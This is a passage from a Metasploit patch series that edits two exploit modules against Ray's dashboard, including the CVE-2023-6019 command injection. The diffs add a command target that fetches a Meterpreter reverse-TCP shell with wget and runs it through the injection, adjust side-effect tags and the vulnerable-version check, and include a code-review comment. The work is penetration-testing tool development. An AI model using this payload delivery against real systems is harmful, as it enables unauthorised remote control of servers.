a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -63,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), + Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end From 01b2a1c55cb9f26bee1fbbadfa52c873eb5dbcf4 Mon Sep 17 00:00:00 2001 
From: Takah1ro Date: Tue, 20 Aug 2024 13:20:42 +0900 Subject: [PATCH 37/42] Enable fetch payload --- ...cpu_profile_cmd_injection_cve_2023_6019.rb | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index 2172e4304e..dcf3a27296 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -36,7 +36,16 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + 'FETCH_COMMAND' => 'WGET' + } + } + ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', @@ -51,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), + Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end @@ -95,7 +105,12 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') ip = first_node['ip'] print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") - execute_cmdstager({ flavor: :wget, pid: pid, ip: ip }) + case target['Type'] + when :nix_cmd + execute_command(payload.encoded, { pid: pid, ip: ip }) + else + execute_cmdstager({ flavor: :wget, pid: pid, ip: ip }) + end end def execute_command(cmd, opts = {}) From 4d1782640b8d147e34102c172ff3bc0402483a8d Mon Sep 17 00:00:00 2001 
From: Takah1ro Date: Tue, 20 Aug 2024 19:12:18 +0900 Subject: [PATCH 38/42] Update sideeffects --- modules/exploits/linux/http/ray_agent_job_rce.rb | 2 +- .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index e107d5b912..da7fcbc6d1 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'SideEffects' => [], + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index dcf3a27296..b6eb8ff2cc 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'SideEffects' => [], + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) From 91167fc85faa8c0ea9880ed1a1cb60494760e476 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 21:44:11 +0900 Subject: [PATCH 39/42] Remove unnecessary option --- modules/exploits/linux/http/ray_agent_job_rce.rb | 1 - .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index da7fcbc6d1..a340e4133b 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb 
+++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index b6eb8ff2cc..f0a3dbbce1 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end From c66540ef2f16d65e74a39e2085b961601d6bec5a Mon Sep 17 00:00:00 2001 From: Takahiro Yokoyama Date: Wed, 21 Aug 2024 21:38:37 +0900 Subject: [PATCH 40/42] Update modules/exploits/linux/http/ray_agent_job_rce.rb use MeterpreterTryToFork to avoid a meterpreter session get killed Co-authored-by: Diego Ledda --- modules/exploits/linux/http/ray_agent_job_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index a340e4133b..5f9da80d80 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', - 'FETCH_COMMAND' => 'WGET' + 'FETCH_COMMAND' => 'WGET', + 'MeterpreterTryToFork' => true } } ] From ee58313d64f26ec2b9bbc7031993c18ece816505 Mon Sep 17 00:00:00 2001 
From: Takah1ro Date: Wed, 21 Aug 2024 22:09:56 +0900 Subject: [PATCH 41/42] Update check function --- .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index f0a3dbbce1..f047a0e271 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown unless ray_version - return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= Rex::Version.new(ray_version) && Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') @nodes = get_nodes return Exploit::CheckCode::Vulnerable unless @nodes.nil? From 39f81e0a45c65d28c54bdc43271cea1dd30c14a2 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 21 Aug 2024 22:32:53 +0900 Subject: [PATCH 42/42] Update check function --- .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index f047a0e271..c385960274 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb 
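Review bot: The new lower bound `Rex::Version.new('2.2.0')` in `check` arrives with no explanation of where it comes from, and the commit title says only "Update check function"; add a comment above the line recording the source of the affected range, e.g. `# Affected versions: 2.2.0 <= ray_version <= 2.6.3 (source: <reference>)`. The double comparison also reads more clearly as a range: `(Rex::Version.new('2.2.0')..Rex::Version.new('2.6.3')).cover?(Rex::Version.new(ray_version))`. `ray_agent_job_rce.rb`'s check in 31/42 still has only the upper bound; if the two modules are meant to share a range that one needs the same change, and if not, a comment saying why would stop the next reader from "fixing" it.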
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown unless ray_version - return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= Rex::Version.new(ray_version) && Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + ray_version = Rex::Version.new(ray_version) + return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3') @nodes = get_nodes return Exploit::CheckCode::Vulnerable unless @nodes.nil?